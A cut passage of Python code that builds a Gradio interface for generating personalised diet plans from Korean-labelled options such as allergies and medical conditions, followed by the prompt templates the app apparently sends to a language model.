cuisine = gr.CheckboxGroup(choices=["한식", "중식", "양식"], label="카테고리")
dietary_restrictions = gr.CheckboxGroup(choices=["채식", "저탄수화물"], label="식이 제한")
allergies = gr.CheckboxGroup(choices=["땅콩", "우유", "글루텐"], label="알레르기 및 불내성")
medical_conditions = gr.CheckboxGroup(choices=["당뇨병", "고혈압"], label="의료 상태")
meals_per_day = gr.Radio(choices=["2끼", "3끼", "4끼"], label="하루 몇 끼 섭취")
cooking_preference = gr.CheckboxGroup(choices=["간단한 조리", "긴 조리 시간"], label="조리 시간 및 용이성")
submit_button = gr.Button("식단 생성")
with gr.Column():
# 결과 출력
result = gr.Markdown()
# 버튼 클릭 시 동작 정의
submit_button.click(
generate_diet_plan,
inputs=[calories, ingredients, cuisine, dietary_restrictions, allergies, medical_conditions, meals_per_day, cooking_preference],
outputs=result
)
demo.launch()
| [
"Create a diet plan with the following requirements:\nCalories: PLACEHOLDER\nIngredients: PLACEHOLDER\nCuisine: PLACEHOLDER\nDietary Restrictions: PLACEHOLDER\nAllergies: PLACEHOLDER\nMedical Conditions: PLACEHOLDER\nMeals per day: PLACEHOLDER\nCooking Preference: PLACEHOLDER",
"You are an assistant capable of creating personalized diet plans."
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.